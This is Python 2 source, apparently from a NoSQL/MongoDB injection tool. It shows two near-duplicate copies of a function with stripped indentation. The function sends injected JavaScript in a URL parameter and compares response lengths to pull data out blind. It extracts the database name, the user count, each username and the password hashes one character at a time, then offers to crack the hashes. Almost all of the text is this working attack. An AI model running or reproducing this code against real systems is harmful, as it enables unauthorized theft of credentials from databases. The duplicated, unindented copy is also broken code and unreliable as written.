def getDBInfo():
curLen = 0
nameLen = 0
gotFullDb = False
gotNameLen = False
gotDbName = False
gotColLen = False
gotColName = False
gotUserCnt = False
finUser = False
dbName = ""
charCounter = 0
nameCounter = 0
usrCount = 0
retrUsers = 0
users = []
hashes = []
crackHash = ""
chars = string.ascii_letters + string.digits
print "Getting baseline True query return size..."
trueUri = uriArray[16].replace("---", "return true; var dummy ='!" + "&")
#print "Debug " + str(trueUri)
req = urllib2.Request(trueUri, None, requestHeaders)
baseLen = int(len(getResponseBodyHandlingErrors(req)))
print "Got baseline true query length of " + str(baseLen)
print "Calculating DB name length..."
while gotNameLen == False:
calcUri = uriArray[16].replace(
"---", "var curdb = db.getName(); if (curdb.length ==" +
str(curLen) + ") {return true;} var dum='a" + "&")
#print "Debug: " + calcUri
req = urllib2.Request(calcUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
#print "Debug length: " + str(lenUri)
if lenUri == baseLen:
print "Got database name length of " + str(curLen) + " characters."
gotNameLen = True
else:
curLen += 1
print "Database Name: ",
while gotDbName == False:
charUri = uriArray[16].replace(
"---", "var curdb = db.getName(); if (curdb.charAt(" +
str(nameCounter) + ") == '" + chars[charCounter] +
"') { return true; } var dum='a" + "&")
req = urllib2.Request(charUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
dbName = dbName + chars[charCounter]
print chars[charCounter],
nameCounter += 1
charCounter = 0
if nameCounter == curLen:
gotDbName = True
else:
charCounter += 1
print "\n"
getUserInf = raw_input("Get database users and password hashes (y/n)? ")
if getUserInf.lower() == "y":
charCounter = 0
nameCounter = 0
# find the total number of users on the database
while gotUserCnt == False:
usrCntUri = uriArray[16].replace(
"---", "var usrcnt = db.system.users.count(); if (usrcnt == " +
str(usrCount) + ") { return true; } var dum='a")
req = urllib2.Request(usrCntUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
print "Found " + str(usrCount) + " user(s)."
gotUserCnt = True
else:
usrCount += 1
usrChars = 0 # total number of characters in username
charCounterUsr = 0 # position in the character array-Username
rightCharsUsr = 0 # number of correct characters-Username
rightCharsHash = 0 # number of correct characters-hash
charCounterHash = 0 # position in the character array-hash
username = ""
pwdHash = ""
charCountUsr = False
query = "{}"
while retrUsers < usrCount:
if retrUsers == 0:
while charCountUsr == False:
# different query to get the first user vs. others
usrUri = uriArray[16].replace(
"---",
"var usr = db.system.users.findOne(); if (usr.user.length == "
+ str(usrChars) + ") { return true; } var dum='a" +
"&")
req = urllib2.Request(usrUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
# Got the right number of characters
charCountUsr = True
else:
usrChars += 1
while rightCharsUsr < usrChars:
usrUri = uriArray[16].replace(
"---",
"var usr = db.system.users.findOne(); if (usr.user.charAt("
+ str(rightCharsUsr) + ") == '" +
chars[charCounterUsr] +
"') { return true; } var dum='a" + "&")
req = urllib2.Request(usrUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
username = username + chars[charCounterUsr]
#print username
rightCharsUsr += 1
charCounterUsr = 0
else:
charCounterUsr += 1
retrUsers += 1
users.append(username)
# reinitialize all variables and get ready to do it again
#print str(retrUsers)
#print str(users)
charCountUsr = False
rightCharsUsr = 0
usrChars = 0
username = ""
while rightCharsHash < 32: #Hash length is static
hashUri = uriArray[16].replace(
"---",
"var usr = db.system.users.findOne(); if (usr.pwd.charAt("
+ str(rightCharsHash) + ") == '" +
chars[charCounterHash] +
"') { return true; } var dum='a" + "&")
req = urllib2.Request(hashUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
pwdHash = pwdHash + chars[charCounterHash]
#print pwdHash
rightCharsHash += 1
charCounterHash = 0
else:
charCounterHash += 1
hashes.append(pwdHash)
print "Got user:hash " + users[0] + ":" + hashes[0]
# reinitialize all variables and get ready to do it again
charCounterHash = 0
rightCharsHash = 0
pwdHash = ""
else:
while charCountUsr == False:
# different query to get the first user vs. others
usrUri = uriArray[16].replace(
"---",
"var usr = db.system.users.findOne({user:{$nin:" +
str(users) + "}}); if (usr.user.length == " +
str(usrChars) + ") { return true; } var dum='a" + "&")
req = urllib2.Request(usrUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
# Got the right number of characters
charCountUsr = True
else:
usrChars += 1
while rightCharsUsr < usrChars:
usrUri = uriArray[16].replace(
"---",
"var usr = db.system.users.findOne({user:{$nin:" +
str(users) + "}}); if (usr.user.charAt(" +
str(rightCharsUsr) + ") == '" + chars[charCounterUsr] +
"') { return true; } var dum='a" + "&")
req = urllib2.Request(usrUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
username = username + chars[charCounterUsr]
#print username
rightCharsUsr += 1
charCounterUsr = 0
else:
charCounterUsr += 1
retrUsers += 1
# reinitialize all variables and get ready to do it again
charCountUsr = False
rightCharsUsr = 0
usrChars = 0
while rightCharsHash < 32: #Hash length is static
hashUri = uriArray[16].replace(
"---",
"var usr = db.system.users.findOne({user:{$nin:" +
str(users) + "}}); if (usr.pwd.charAt(" +
str(rightCharsHash) + ") == '" +
chars[charCounterHash] +
"') { return true; } vardum='a" + "&")
req = urllib2.Request(hashUri, None, requestHeaders)
lenUri = int(len(getResponseBodyHandlingErrors(req)))
if lenUri == baseLen:
pwdHash = pwdHash + chars[charCounterHash]
rightCharsHash += 1
charCounterHash = 0
else:
charCounterHash += 1
users.append(username)
hashes.append(pwdHash)
print "Got user:hash " + users[retrUsers -
1] + ":" + hashes[retrUsers - 1]
# reinitialize all variables and get ready to do it again
username = ""
charCounterHash = 0
rightCharsHash = 0
pwdHash = ""
crackHash = raw_input("Crack recovered hashes (y/n)?: ")
while crackHash.lower() == "y":
menuItem = 1
for user in users:
print str(menuItem) + "-" + user
menuItem += 1
userIndex = raw_input("Select user hash to crack: ")
nsmmongo.passCrack(users[int(userIndex) - 1],
hashes[int(userIndex) - 1])
crackHash = raw_input("Crack another hash (y/n)?")
raw_input("Press enter to continue...")
return
def getDBInfo():
curLen = 0
nameLen = 0
gotFullDb = False
gotNameLen = False
gotDbName = False
gotColLen = False
gotColName = False
gotUserCnt = False
finUser = False
dbName = ""
charCounter = 0
nameCounter = 0
usrCount = 0
retrUsers = 0
users = []
hashes = []
crackHash = ""
chars = string.ascii_letters + string.digits
print "Getting baseline True query return size..."
trueUri = uriArray[16].replace("---","return true; var dummy ='!" + "&")
#print "Debug " + str(trueUri)
baseLen = int(len(urllib.urlopen(trueUri).read()))
print "Got baseline true query length of " + str(baseLen)
print "Calculating DB name length..."
while gotNameLen == False:
calcUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.length ==" + str(curLen) + ") {return true;} var dum='a" + "&")
#print "Debug: " + calcUri
lenUri = int(len(urllib.urlopen(calcUri).read()))
#print "Debug length: " + str(lenUri)
if lenUri == baseLen:
print "Got database name length of " + str(curLen) + " characters."
gotNameLen = True
else:
curLen += 1
print "Database Name: ",
while gotDbName == False:
charUri = uriArray[16].replace("---","var curdb = db.getName(); if (curdb.charAt(" + str(nameCounter) + ") == '"+ chars[charCounter] + "') { return true; } var dum='a" + "&")
lenUri = int(len(urllib.urlopen(charUri).read()))
if lenUri == baseLen:
dbName = dbName + chars[charCounter]
print chars[charCounter],
nameCounter += 1
charCounter = 0
if nameCounter == curLen:
gotDbName = True
else:
charCounter += 1
print "\n"
getUserInf = raw_input("Get database users and password hashes (y/n)? ")
if getUserInf in yes_tag:
charCounter = 0
nameCounter = 0
#find the total number of users on the database
while gotUserCnt == False:
usrCntUri = uriArray[16].replace("---","var usrcnt = db.system.users.count(); if (usrcnt == " + str(usrCount) + ") { return true; } var dum='a")
lenUri = int(len(urllib.urlopen(usrCntUri).read()))
if lenUri == baseLen:
print "Found " + str(usrCount) + " user(s)."
gotUserCnt = True
else:
usrCount += 1
usrChars = 0 #total number of characters in username
charCounterUsr = 0 #position in the character array-Username
rightCharsUsr = 0 #number of correct characters-Username
rightCharsHash = 0 #number of correct characters-hash
charCounterHash = 0 #position in the character array-hash
username = ""
pwdHash = ""
charCountUsr = False
query = "{}"
while retrUsers < usrCount:
if retrUsers == 0:
while charCountUsr == False:
#different query to get the first user vs. others
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
lenUri = int(len(urllib.urlopen(usrUri).read()))
if lenUri == baseLen:
#Got the right number of characters
charCountUsr = True
else:
usrChars += 1
while rightCharsUsr < usrChars:
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
lenUri = int(len(urllib.urlopen(usrUri).read()))
if lenUri == baseLen:
username = username + chars[charCounterUsr]
#print username
rightCharsUsr += 1
charCounterUsr = 0
else:
charCounterUsr += 1
retrUsers += 1
users.append(username)
#reinitialize all variables and get ready to do it again
#print str(retrUsers)
#print str(users)
charCountUsr = False
rightCharsUsr = 0
usrChars = 0
username = ""
while rightCharsHash < 32: #Hash length is static
hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne(); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } var dum='a" + "&")
lenUri = int(len(urllib.urlopen(hashUri).read()))
if lenUri == baseLen:
pwdHash = pwdHash + chars[charCounterHash]
#print pwdHash
rightCharsHash += 1
charCounterHash = 0
else:
charCounterHash += 1
hashes.append(pwdHash)
print "Got user:hash " + users[0] + ":" + hashes[0]
#reinitialize all variables and get ready to do it again
charCounterHash = 0
rightCharsHash = 0
pwdHash = ""
else:
while charCountUsr == False:
#different query to get the first user vs. others
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.length == " + str(usrChars) + ") { return true; } var dum='a" + "&")
lenUri = int(len(urllib.urlopen(usrUri).read()))
if lenUri == baseLen:
#Got the right number of characters
charCountUsr = True
else:
usrChars += 1
while rightCharsUsr < usrChars:
usrUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.user.charAt(" + str(rightCharsUsr) + ") == '"+ chars[charCounterUsr] + "') { return true; } var dum='a" + "&")
lenUri = int(len(urllib.urlopen(usrUri).read()))
if lenUri == baseLen:
username = username + chars[charCounterUsr]
#print username
rightCharsUsr += 1
charCounterUsr = 0
else:
charCounterUsr += 1
retrUsers += 1
#reinitialize all variables and get ready to do it again
charCountUsr = False
rightCharsUsr = 0
usrChars = 0
while rightCharsHash < 32: #Hash length is static
hashUri = uriArray[16].replace("---","var usr = db.system.users.findOne({user:{$nin:" + str(users) + "}}); if (usr.pwd.charAt(" + str(rightCharsHash) + ") == '"+ chars[charCounterHash] + "') { return true; } vardum='a" + "&")
lenUri = int(len(urllib.urlopen(hashUri).read()))
if lenUri == baseLen:
pwdHash = pwdHash + chars[charCounterHash]
rightCharsHash += 1
charCounterHash = 0
else:
charCounterHash += 1
users.append(username)
hashes.append(pwdHash)
print "Got user:hash " + users[retrUsers-1] + ":" + hashes[retrUsers-1]
#reinitialize all variables and get ready to do it again
username = ""
charCounterHash = 0
rightCharsHash = 0
pwdHash = ""
crackHash = raw_input("Crack recovered hashes (y/n)?: ")
while crackHash in yes_tag:
menuItem = 1
for user in users:
print str(menuItem) + "-" + user
menuItem +=1
userIndex = raw_input("Select user hash to crack: ")
nsmmongo.passCrack(users[int(userIndex)-1],hashes[int(userIndex)-1])
crackHash = raw_input("Crack another hash (y/n)?")
raw_input("Press enter to continue...")
return
